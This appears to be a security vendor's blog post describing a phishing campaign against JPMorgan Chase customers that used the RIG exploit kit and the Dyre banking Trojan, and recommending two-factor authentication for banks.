JPMorgan Chase Hack: Four Ways to Steal Your Credentials
If you needed more proof that authentication attacks are rising, look no further than the JP Morgan data breach, reported weeks ago. The investigation is still underway, but Proofpoint security researchers have analyzed the 150,000 phishing emails that hit JP Morgan Chase customers to find that attackers are rolling out more than one way to exploit stolen credentials.
Dubbed the ‘Smash & Grab’ campaign, Proofpoint has found that the emails not only ask users to submit their credentials, but the spoofed page also redirects users to a RIG exploit kit via a malicious iframe. RIG checks a machine to see if it’s vulnerable, and then installs the banking Trojan Dyre on a user’s machine.
Symantec reported that RIG checks a computer for certain vulnerabilities found in:
- Microsoft’s IE (CVE-2013-2551, CVE-2014-0322)
- Silverlight (CVE-2013-0074)
- Adobe Flash (CVE-2014-0497)
- Java (CVE-2013-2465, CVE-2012-0507)
This means even if a user doesn’t give away their password, there’s a chance their machine may be infected anyway.
If a user enters their credentials into the spoofed page, they’re served an error report telling them they need a Java update. Users are then prompted to download a fake Java executable file, which effectively installs the Dyre Trojan on their machine.
The Remote Access Trojan (RAT) Dyre is designed to steal passwords and data. This newly discovered Trojan reported in June can bypass SSL within the browser to steal credentials, with a list of U.S. and internationally-based banks as their targets, including Bank of America, NatWest, Citibank, RBS and Ulster Bank, according to DarkReading.com. One distinction of this malware is that it doesn’t encrypt any data it POSTs back to the attacker’s command and control (C&C) servers.
Other credential-harvesting email methods include PDFs and zip attachments that attempts to install Dyre once users open them. Whew - that’s a lot of ways attackers are trying to steal your credentials.
These attacks put heavy emphasis on the importance of stealing credentials (even at the risk of getting found out by using multiple different methods to procure legitimate usernames/passwords), whether via malware or traditional social engineering means. As the SANS Institute Editor’s Note by William Hugh Murray pointed out in the SANS NewsBites Vol. 16 Num. 69 e-newsletter:
The layered security architectures of money center banks are the targets of daily and resourceful attacks. Almost by definition, some of these attacks enjoy at least limited success. If there were no success at all, the attackers would tire, retire, or seek softer targets. That said, such success should not, as in this case, include "gigabytes of sensitive data." That it did so suggests insufficient layers and monitoring. Strong Authentication should be the first layer.
By enabling two-factor authentication as the first layer of defense, online banking and financial firms can protect themselves and their users from attacks that steal passwords and successfully authenticate from a remote location and device.
Two-factor authentication is highly recommended by the Federal Financial Institutions Examination Council (FFIEC), the governing body working to secure and standardize web-based financial services for the industry. The FFIEC states that single-factor authentication (only a username and password) is not adequate for:
- Sensitive communications
- High-dollar value transactions or
- Privileged user access (i.e., network administrators)
They also recommend using out-of-band authentication (OOBA) for transactions on the premise that it is more secure than other two-factor authentication methods. Find out more about the standards and learn more about OOBA in Answer to OTP Bypass: Out-of-Band Two-Factor Authentication.
Read up on financial and online banking security in:
Two-Factor Authentication, Financial Firms, and You
Two-Factor Authentication for Bank Wire Transfers
Facing Modern Information Security Challenges in Banking & Finance
ATM Admin Panels Hacked to Allow Unlimited Withdrawals, Warns FFIEC
Modern Two-Factor: Could It Have Prevented Bitcoin Breaches?